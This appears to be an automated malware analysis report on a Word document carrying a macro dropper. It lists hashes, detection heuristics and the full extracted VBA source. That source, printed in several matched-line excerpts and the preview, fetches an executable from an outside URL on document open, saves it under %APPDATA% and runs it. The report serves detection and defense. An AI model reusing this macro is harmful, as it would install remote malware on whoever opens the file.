Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1829fa497c0e09c1…

MALICIOUS

Office (OOXML)

16.2 KB Created: 2014-05-19 22:09:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2014-07-31
MD5: eb83dd9498cb37b87d8128a9be073d15 SHA-1: fce65d954aa0754cd6e77b7cbc529f1214c38c21 SHA-256: 1829fa497c0e09c1fa1be7dbb90a9606386247027dbc7d0943db342839079f5c
418 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is an Office document containing VBA macros that are automatically executed upon opening. The script utilizes WScript.Shell and CreateObject to download a file from 'http://www.filehole.net/files/9784278da0d31dcb64d5e3d47fe1b153.exe' and saves it as '%APPDATA%\service\service.exe'. It then executes this downloaded file, indicating a dropper functionality.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Sub Sub_001(): Set Var_001 = CreateObject("WScript.Shell"): Var_002 = Var_001.ExpandEnvironmentStrings("%APPDATA%"): Dim Var_003: Var_003 = Var_002 & "\service": Set Var_004 = CreateObject("Scripting.FileSystemObject")
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    Sub Sub_001(): Set Var_001 = CreateObject("WScript.Shell"): Var_002 = Var_001.ExpandEnvironmentStrings("%APPDATA%"): Dim Var_003: Var_003 = Var_002 & "\service": Set Var_004 = CreateObject("Scripting.FileSystemObject")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
       Else: Set Var_005 = CreateObject("Scripting.FileSystemObject"): Var_005.CreateFolder Var_003: End If: Dim Var_006: Set Var_006 = CreateObject("Adodb.Stream"): Dim Var_007: Set Var_007 = CreateObject("Microsoft.XMLHTTP"): Var_007.Open "GET", "http://www.filehole.net/files/9784278da0d31dcb64d5e3d47fe1b153.exe", False: Var_007.Send: With Var_006: .Type = 1: .Open: .write Var_007.responseBody: .savetofile Var_002 & "\service\service.exe", 2: End With: Call Func_001(Var_003): End Sub
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Sub Sub_001(): Set Var_001 = CreateObject("WScript.Shell"): Var_002 = Var_001.ExpandEnvironmentStrings("%APPDATA%"): Dim Var_003: Var_003 = Var_002 & "\service": Set Var_004 = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen(): Sub_001: End Sub
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open(): Sub_001: End Sub
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.filehole.net/files/9784278da0d31dcb64d5e3d47fe1b153.exe Referenced by macro
    • http://www.filehole.net/files/9784278da0d31dcb64d5e3d47fe1b153.exe�Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1765 bytes
SHA-256: cf08c207ea36b6024b929824c4e33f04194fed701a73f5bd3f0c164dbc77290a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
End Function

Sub AutoOpen(): Sub_001: End Sub

Sub Document_Open(): Sub_001: End Sub

Sub Sub_001(): Set Var_001 = CreateObject("WScript.Shell"): Var_002 = Var_001.ExpandEnvironmentStrings("%APPDATA%"): Dim Var_003: Var_003 = Var_002 & "\service": Set Var_004 = CreateObject("Scripting.FileSystemObject")

   If (Var_004.FolderExists(Var_003)) Then

   Else: Set Var_005 = CreateObject("Scripting.FileSystemObject"): Var_005.CreateFolder Var_003: End If: Dim Var_006: Set Var_006 = CreateObject("Adodb.Stream"): Dim Var_007: Set Var_007 = CreateObject("Microsoft.XMLHTTP"): Var_007.Open "GET", "http://www.filehole.net/files/9784278da0d31dcb64d5e3d47fe1b153.exe", False: Var_007.Send: With Var_006: .Type = 1: .Open: .write Var_007.responseBody: .savetofile Var_002 & "\service\service.exe", 2: End With: Call Func_001(Var_003): End Sub

Function Func_001(bVal_001): Dim Var_004, Var_008, Var_009, Var_010, Var_011, Var_012: Dim Var_013: Set Var_013 = CreateObject("WScript.Shell"): Var_011 = "": Set Var_004 = CreateObject("Scripting.FileSystemObject")

    If (Var_004.FolderExists(bVal_001)) Then

      Set Var_008 = Var_004.GetFolder(bVal_001): Set Var_009 = Var_008.Files: For Each Var_010 In Var_009: Dim Var_014: Var_014 = bVal_001 & "\" & Var_010.Name: Var_013.Run Chr(34) & Var_014 & Chr(34), 1, True: Next: Set Var_010 = Nothing: Set Var_009 = Nothing: Set Var_008 = Nothing: End If: Set Var_004 = Nothing: End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 10240 bytes
SHA-256: 78975426c36a0bc2a629c5c7f6831c0d94bf9c1042e9f367d82bc9f5c6a8fe01
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.